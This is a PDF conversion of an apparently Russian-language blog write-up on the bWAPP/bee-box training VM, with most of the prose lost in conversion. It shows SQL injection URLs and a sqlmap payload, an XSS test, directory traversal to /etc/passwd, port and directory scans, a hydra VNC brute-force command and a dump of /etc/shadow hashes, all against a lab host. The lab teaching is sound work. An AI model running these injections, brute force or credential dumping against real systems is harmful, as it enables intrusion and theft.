Вы находитесь на странице: 1из 23

TM Feed

Geektimes

@Mach1ne

31,0

0,0

Google Devices

32

31

14 2015 15:35

- OWASP Top-10
bWAPP

- *, *

, !
- ( ), OWASP Top-10,
bWAPP.

:
Open Web Application Security Project (OWASP) -. OWASP
, . , , ,
, . -10
-, -.
-10 :

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

A1
A2
A3 (XSS)
A4
A5
A6
A7
A8 (CSRF)
A9
A10
, .
buggy web application (bWAPP) -, . , 100
, -10 OWASP. - .
bWAPP Malik Mesellem ( )

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

PHP , MYSQL. /, WAMP XAMPP.


bee-box, .
, bWAPP:

:
, , .
bwapp , .

:
, - ( :)), , ,
-.

:

, bWAPP.
, .

:
/ . -.

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

:)

WARNING!
:
1. - .
2. , .
/ .
// .

SQL-injection
SQL Injection (GET/Search)
, . , Hulk.

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

, :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk&action=search

order by :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20order%20by%2010%20--%20&action=search

7:
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20order%20by%207%20--%20&action=search

union:

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20union%20select%201,2,3,4,5,6,7%20from%20users%20--%20&action=search

, , :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20union%20select%201,database%28%29,user%28%29,4,password,6,7%20from%20users%20--%20&action=search

SQL Injection (POST/Search)


/bWAPP/sqli_6.php, Hulk', , ? Burpsuite Sqlmap:
burpsuite

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

, , Request .txt .
sqlmap :
sqlmap -r sql.txt

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

sqlmap , , , , :
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: title=hulk%' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x7162767071,FLOOR(RAND(0)*2))x F
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&action=search

payload :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x7162767
071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&action=search

, , :

XSS?
.
XSS Reflected (GET)

<script>alert(1);</script>

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Directory Traversal Files


http://192.168.1.18/bWAPP/directory_traversal_1.php?page=message.txt

/etc/passwd:

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Directory Traversal Directories


http://192.168.1.18/bWAPP/directory_traversal_2.php?directory=documents

/etc/:

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com


boot2root ( bWAPP) ,
.
nmap':

Nmap scan report for bee-box (192.168.1.18)


Host is up (0.0050s latency).
Not shown: 983 closed ports
PORT

STATE SERVICE

21/tcp

open

ftp

22/tcp

open

ssh

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

25/tcp

open

smtp

80/tcp

open

http

139/tcp

open

netbios-ssn

443/tcp

open

https

445/tcp

open

microsoft-ds

512/tcp

open

exec

513/tcp

open

login

514/tcp

open

shell

666/tcp

open

doom

3306/tcp open

mysql

5901/tcp open

vnc-1

6001/tcp open

X11:1

8080/tcp open

http-proxy

8443/tcp open

https-alt

9080/tcp open

glrpc

Nikto ( ), - , FTP VNC .

FTP
Dirbuster:

Dir found: /phpmyadmin/ - 200


Dir found: /evil/ - 200
Dir found: /webdav/ - 200
File found: /webdav/Iron_Man.pdf - 200
File found: /webdav/Terminator_Salvation.pdf - 200
File found: /webdav/The_Amazing_Spider-Man.pdf - 200
File found: /webdav/The_Cabin_in_the_Woods.pdf - 200
File found: /webdav/The_Dark_Knight_Rises.pdf - 200
File found: /webdav/The_Incredible_Hulk.pdf - 200
File found: /webdav/bWAPP_intro.pdf - 200


nmap --script=ftp*

, :

PORT

STATE SERVICE

VERSION

21/tcp

open

ProFTPD 1.3.1

ftp

| ftp-anon: Anonymous FTP login allowed (FTP code 230)


| -rw-rw-r--

1 root

www-data

543803 Nov

2 22:52 Iron_Man.pdf

| -rw-rw-r--

1 root

www-data

462949 Nov

2 22:52 Terminator_Salvation.pdf

| -rw-rw-r--

1 root

www-data

544600 Nov

2 22:52 The_Amazing_Spider-Man.pdf

| -rw-rw-r--

1 root

www-data

526187 Nov

2 22:52 The_Cabin_in_the_Woods.pdf

| -rw-rw-r--

1 root

www-data

756522 Nov

2 22:52 The_Dark_Knight_Rises.pdf

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

| -rw-rw-r--

1 root

www-data

618117 Nov

|_-rw-rw-r--

1 root

www-data

5010042 Nov

2 22:52 The_Incredible_Hulk.pdf
2 22:52 bWAPP_intro.pdf

2 , , ftp ( /webdav/) http.


php .

, , ftp http, ? :)

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

VNC

192.168.1.18:5901

, hydra:

hydra -P /wordlist/pass.txt -s 5901 192.168.1.18 vnc

! , root'.

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

root, /etc/shadow

root:$1$6.aigTP1$FC1TuoITEYSQwRV0hi6gj/:15792:0:99999:7:::
bee:$1$tJB0ndAJ$0d42BkRQ7vebj/bE5RdQH1:15792:0:99999:7:::
neo:$1$fSorv0ad$56lfF9qd8o4caaSB6dVqi/:15897:0:99999:7:::
alice:$1$yRUOVrYB$9f4TMaym/xOSeGbmsgFGI/:15897:0:99999:7:::
thor:$1$Iy6Mvuaz$FzcNXTQ668kDD5LY.ObdL/:15897:0:99999:7:::
wolverine:$1$PUGlrXi8$oXOwDBaAzxtgXh10Xkw9i/:15897:0:99999:7:::
johnny:$1$uqzKnduQ$MPxhWXcf2FFQarhO95d5y/:15897:0:99999:7:::
selene:$1$BHZLob3h$mru35IhZzRdnfTHOADrkJ0:15897:0:99999:7:::

hashcat' :

Bee-box write-up' boot2root . -, //


.
, , , :
, , Heartbleed? ! 2 .
/ - , , , .
, -, .


bWAPP Malik Mesellem ( )
-10 OWASP
@BeLove
, @BeLove
g0tmi1k , boot2root
, 5
. .

O W ASP, be e -box , pe nte st,

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com


- 4


34
,
64
subversion trac

20

+17

25,4k

@Mach1ne

215

31,0

0,0

+10

TP-LINK ,
15,5k

+19

12

16

Hello, TensorFlow. Google


2,3k

71

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

+11


2,4k

+10

ITSM
1,9k

+8

42

js-
1,3k

11

(8)
+1

Audiophile 14 2015 16:18

- havij 1.17 . . SQL .


, .

Mach1ne 14 2015 16:29

, , .
0

outofspace 14 2015 23:04

, , Beast/crime/breach?
, , , bwapp' , , .
pentesterlab

Mach1ne 15 2015 03:14

bWAPP'a, 2 , ( ) cheatsheet', .
.
. , 40 , - ,
.
0

BeLove 15 2015 21:29

xss - / - (.. ).
CTF (cutycapt ).
, (ruby/java/python). php :)

Mach1ne 17 2015 21:05

+2

bWAPP. :)

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

LukaSafonov 29 2016 00:37

OWASP .

Mach1ne 11 2016 14:25

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

+1

pdfcrowd.com

, , . , , .

. , .

Firefox 48

en Source

Hello, TensorFlow. Google 0


js- 2
5 , 2
ITSM 0
. Zoneminder Debian 8 5

b, fb2, .

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

TM

IT

Q&A

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com